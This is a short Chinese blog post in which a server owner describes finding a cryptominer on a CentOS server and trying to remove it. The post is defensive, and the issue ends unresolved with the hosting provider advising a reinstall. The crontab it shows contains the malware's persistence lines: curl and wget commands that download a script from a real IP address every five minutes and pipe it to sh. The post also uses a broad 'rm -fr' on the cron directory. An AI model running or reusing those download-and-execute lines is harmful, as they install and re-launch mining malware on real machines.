CentOS 服务器遇到挖矿程序

背景

服务器好久不登录，近期登陆时发现特别卡，于是使用 top 命令查看进程信息，发现有一个进程占用了 90% 以上的 CPU 资源，则登陆阿里云服务器发现漏洞警告，发现这个进程是在挖矿。

讲解

通常这种挖矿病毒，简单的 kill 和把进程的所在文件夹删除掉都不能起到斩草除根的效果，因这种病毒都会在服务器中创建一个定时脚本，每一段时间会检测病毒脚本是否被杀死了，如果杀死了并且可执行文件也被删除了，那么它就会自动下载源程序并且启动执行脚本。所以解决问题根本所在就是将定时任务删除掉，在将该进程杀掉才能起到效果。

解决

一、使用 cat /var/spool/cron/crontabs/root 查看定时任务内容

cat  /var/spool/cron/crontabs/root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

可以看出来它有两个任务，删除 /var/spool/cron 下的内容

 rm -fr  /var/spool/cron/

二、删除进程和执行脚本
执行脚本路径使用 ps 命令来查看

[root@izbp11bmmclnlx35st0s3rz ~]# ps 31688
  PID TTY      STAT   TIME COMMAND
31688 ?        Ssl   11:07 /tmp/Macron

最后还是没有解决，和阿里云沟通结果：建议您重装系统呢。

本作品采用《CC 协议》，转载必须注明作者和本文链接